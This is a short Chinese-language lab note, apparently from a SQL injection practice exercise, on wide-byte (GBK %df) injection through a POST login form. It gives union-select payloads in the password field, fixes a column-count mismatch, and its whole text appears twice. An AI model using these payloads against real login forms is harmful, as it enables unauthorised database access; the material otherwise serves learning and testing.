还是宽字节注入,POST版本的
uname=1&passwd=1%df' union select 1,2,3#
提交报错
列名不匹配,改一下就好了
uname=1&passwd=1%df' union select 1,2#
看一下源码,果然只select了两个字段
还是宽字节注入,POST版本的
uname=1&passwd=1%df' union select 1,2,3#
提交报错
列名不匹配,改一下就好了
uname=1&passwd=1%df' union select 1,2#
看一下源码,果然只select了两个字段